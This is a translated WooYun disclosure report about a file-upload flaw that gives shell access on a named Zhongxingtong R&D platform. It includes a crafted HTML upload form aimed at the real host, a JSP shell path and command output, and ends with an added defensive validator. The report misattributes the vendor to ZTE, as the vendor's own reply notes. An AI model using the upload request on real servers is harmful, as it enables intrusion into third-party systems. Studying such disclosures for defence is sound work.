
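Vulnerability summary

Bug ID: wooyun-2016-0201999

Title: Getshell on an important Zhongxingtong (中兴通) platform gives direct access to multiple intranet systems

Vendor: ZTE Corporation (中兴通讯股份有限公司)

Author: 艺术家

Submitted: 2016-04-27 15:44

Fix time: 2016-04-27 17:23

Public disclosure time: 2016-04-27 17:23

Vulnerability type: File upload leading to arbitrary code execution

Severity: High

Self-assessed Rank: 20

Status: The vendor has been notified of the vulnerability but has ignored it

Source: http://www.wooyun.org. For questions or help, contact [email protected]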



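Vulnerability details

Disclosure status:

2016-04-27: Details sent to the vendor, awaiting vendor handling
2016-04-27: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description: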

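Zhongxingtong (中兴通) was founded in 1994 and, after 21 years of unremitting effort, has become a comprehensive enterprise group of considerable scale. As of mid-2015, Zhongxingtong holds 2 companies listed on the New Third Board, has net assets of about 4 billion yuan, owns 30,000 square meters of property in Beijing and elsewhere, and has about six hundred employees.

As the internet revolution deepens, Zhongxingtong is once again embracing change and setting out anew on the entrepreneurial road. On the basis of improving and strengthening its tax and finance informatization business, the group is growing organically and expanding outward, strategically laying out Internet+ operations and forming a new development pattern of one body (Internet+ operations) and two wings (equity investment and property management), driven by three wheels.

Internet+ operations represent Zhongxingtong's direction of strategic transformation and include segments such as Zhongxingtong Tax and Finance, Zhongxingtong Finance, the Internet+ integrity system, and online-merchant startup incubation. Relying on a customer base of a million tax-service enterprise customers, Zhongxingtong continues to work the tax and finance informatization field through service upgrades, and offers financial services to small and medium-sized enterprise customers to help them grow, so that tax and finance services complement each other. Building on many years in cryptographic services, Zhongxingtong launched the Dema (德码) platform, aimed at promoting genuine goods and trustworthy service, and cultivates platform sellers through startup incubation, in order to build a localized e-commerce ecosystem, the Dema Circle (德码圈).

Harmony reaches far; a thriving enterprise prospers. Those who prosper should benefit the whole world. Looking back, every step of Zhongxingtong's development has taken embracing the times as its theme and contributing to society as its goal. Looking ahead, Zhongxingtong will hold to its original aspiration, seek progress amid change, and strive tirelessly to become a century-old enterprise that operates sustainably and serves society!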

Detailed description:

Vulnerable site: http://yfgl.chinazxt.com
It is an RDP system containing multiple important internal documents. GETSHELL

dir=cmVwb3NpdG9yeQ%3D%3D&address=LzAwMDAwMDAwMC82OTJkMmUxOS1iNzUwLTRhODktOTEyNC03YjdkMDEwYTViMDM%3D&fileName=Mg%3D%3D&fileExtName=txt


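The custom directory and the name of the uploaded file are base64-encoded; the file name generated by the code is a UUID string.
Constructed request: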

<form id="frmUpload" enctype="multipart/form-data" action="http://yfgl.chinazxt.com/upload?dir=cmVwb3NpdG9yeQ==&name=bXl0ZXN0LmpzcA==&start=0&size=7000" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>


The uploaded file is obtained:



http://yfgl.chinazxt.com/repository/000000000/mytest.jsp
This threatens the security of the intranet.





E:\Bronzesoft\RDM\Application\rdmapp\power\> whoami
ibm-062501538e1\admini


Multiple intranet systems are threatened:


Proof of vulnerability:


Fix:
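
A server-side check for the `dir` and `name` parameters of the upload request described above, as an added example that is not part of the original report or the vendor's code: it base64-decodes both values and rejects script extensions, path components and unlisted directories. The allow-lists and function names are assumptions; the same function can also be run over query strings taken from access logs to find earlier uploads of this kind.

```python
import base64
import posixpath
from urllib.parse import parse_qs

# Assumed policy (not from the report): adjust to what the application needs.
ALLOWED_DIRS = {"repository"}
ALLOWED_EXTS = {".txt", ".pdf", ".doc", ".docx", ".xls", ".xlsx", ".png", ".jpg"}

# Query string of the upload request shown in the report.
REPORTED_QUERY = "dir=cmVwb3NpdG9yeQ==&name=bXl0ZXN0LmpzcA==&start=0&size=7000"


def decode_param(params, key):
    """Decode one base64 query parameter; None if absent or malformed."""
    values = params.get(key)
    if not values:
        return None
    try:
        return base64.b64decode(values[0], validate=True).decode("utf-8")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None


def check_upload_query(query):
    """Return the policy violations for an /upload query string ([] = accept)."""
    params = parse_qs(query, keep_blank_values=True)
    directory = decode_param(params, "dir")
    name = decode_param(params, "name")
    if directory is None or name is None:
        return ["dir/name missing or not valid base64"]
    problems = []
    if directory not in ALLOWED_DIRS:
        problems.append("directory not in allow-list: %r" % directory)
    # Must be a bare file name: no separators, parent references or NUL bytes.
    bare = posixpath.basename(name.replace("\\", "/"))
    if name != bare or name in ("", ".", "..") or "\x00" in name:
        problems.append("file name contains path components: %r" % name)
    # Exact match on the final extension also rejects "x.jsp." and "x.jsp::$DATA".
    ext = posixpath.splitext(name)[1].lower()
    if ext not in ALLOWED_EXTS:
        problems.append("extension not in allow-list: %r" % ext)
    return problems


if __name__ == "__main__":
    print(check_upload_query(REPORTED_QUERY))
```

The stronger fix is to ignore the client-supplied name altogether, store the file under the server-generated UUID, and keep the upload directory outside any path from which the servlet container executes JSP.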

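Copyright notice: please credit the source 艺术家@乌云 (WooYun) when reposting


Vulnerability response

Vendor response:

Severity: No impact, ignored by vendor

Ignored at: 2016-04-27 17:23

Vendor reply:

This company has absolutely nothing to do with ZTE...

Latest status:

None yet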

